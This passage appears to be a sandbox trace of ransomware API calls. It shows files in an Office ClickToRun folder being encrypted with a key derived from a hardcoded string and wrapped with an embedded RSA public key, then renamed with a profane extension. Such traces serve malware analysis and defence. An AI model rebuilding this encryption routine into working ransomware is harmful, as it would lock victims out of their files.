hFile=0xffffffff, lpBuffer=0x28aa2f8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.196] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.196] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.196] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.196] CloseHandle (hObject=0xffffffff) returned 1 [0239.196] CloseHandle (hObject=0xffffffff) returned 1 [0239.196] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.197] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.197] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml.gsg")) returned 0 [0239.197] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml.fuck")) returned 0 [0239.198] CryptDestroyHash (hHash=0x2893af0) returned 1 [0239.198] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.198] CryptReleaseContext (hProv=0x28ab1d8, dwFlags=0x0) returned 1 [0239.198] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.198] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.198] GetLastError () returned 0x5 [0239.198] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml")) returned 0x20 [0239.199] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.201] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.202] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.202] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.202] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28aa738) returned 1 [0239.205] CryptCreateHash (in: hProv=0x28aa738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.205] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.205] CryptHashData (hHash=0x2893fb0, pbData=0x2884c88, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.205] CryptDeriveKey (in: hProv=0x28aa738, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893b70) returned 1 [0239.205] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.205] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.205] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ab1d8) returned 1 [0239.206] CryptImportPublicKeyInfo (in: hCryptProv=0x28ab1d8, dwCertEncodingType=0x1, pInfo=0x2897510*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897540*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897548*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894970) returned 1 [0239.206] CryptEncrypt (in: hKey=0x2894970, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.206] CryptEncrypt (in: hKey=0x2894970, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28aa8d0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28aa8d0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.206] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28aa8d0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.206] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.206] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.206] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.206] CloseHandle (hObject=0xffffffff) returned 1 [0239.206] CloseHandle (hObject=0xffffffff) returned 1 [0239.207] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.207] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.208] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.208] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.209] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.209] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.209] CryptReleaseContext (hProv=0x28aa738, dwFlags=0x0) returned 1 [0239.209] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.209] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.209] GetLastError () returned 0x5 [0239.209] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml")) returned 0x20 [0239.210] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.210] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.211] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.211] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.211] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28aa518) returned 1 [0239.223] CryptCreateHash (in: hProv=0x28aa518, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.223] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.223] CryptHashData (hHash=0x2893b70, pbData=0x28850c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.223] CryptDeriveKey (in: hProv=0x28aa518, Algid=0x6610, hBaseData=0x2893b70, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893fb0) returned 1 [0239.223] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.223] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.223] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28aa5a0) returned 1 [0239.224] CryptImportPublicKeyInfo (in: hCryptProv=0x28aa5a0, dwCertEncodingType=0x1, pInfo=0x2897e00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897e30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897e38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28948b0) returned 1 [0239.224] CryptEncrypt (in: hKey=0x28948b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.224] CryptEncrypt (in: hKey=0x28948b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28aa738*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28aa738*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.224] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28aa738, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.224] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.224] CryptEncrypt (in: hKey=0x2893fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.224] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.224] CloseHandle (hObject=0xffffffff) returned 1 [0239.224] CloseHandle (hObject=0xffffffff) returned 1 [0239.224] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.225] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.225] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml.gsg")) returned 0 [0239.226] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml.fuck")) returned 0 [0239.226] CryptDestroyHash (hHash=0x2893b70) returned 1 [0239.226] CryptDestroyKey (hKey=0x2893fb0) returned 1 [0239.226] CryptReleaseContext (hProv=0x28aa518, dwFlags=0x0) returned 1 [0239.226] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.226] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.229] GetLastError () returned 0x5 [0239.230] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml")) returned 0x20 [0239.230] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.231] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.231] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.232] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.233] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28aaa68) returned 1 [0239.236] CryptCreateHash (in: hProv=0x28aaa68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.236] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.236] CryptHashData (hHash=0x2893b70, pbData=0x2885110, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.236] CryptDeriveKey (in: hProv=0x28aaa68, Algid=0x6610, hBaseData=0x2893b70, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893fb0) returned 1 [0239.236] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.236] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.236] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ab260) returned 1 [0239.237] CryptImportPublicKeyInfo (in: hCryptProv=0x28ab260, dwCertEncodingType=0x1, pInfo=0x2897ed0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897f00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897f08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28943f0) returned 1 [0239.237] CryptEncrypt (in: hKey=0x28943f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.237] CryptEncrypt (in: hKey=0x28943f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28aa628*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28aa628*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.237] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28aa628, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.238] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.238] CryptEncrypt (in: hKey=0x2893fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.238] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.238] CloseHandle (hObject=0xffffffff) returned 1 [0239.238] CloseHandle (hObject=0xffffffff) returned 1 [0239.238] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.238] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.239] DeleteFileA (lpFileName="C:\\\\Users\\All 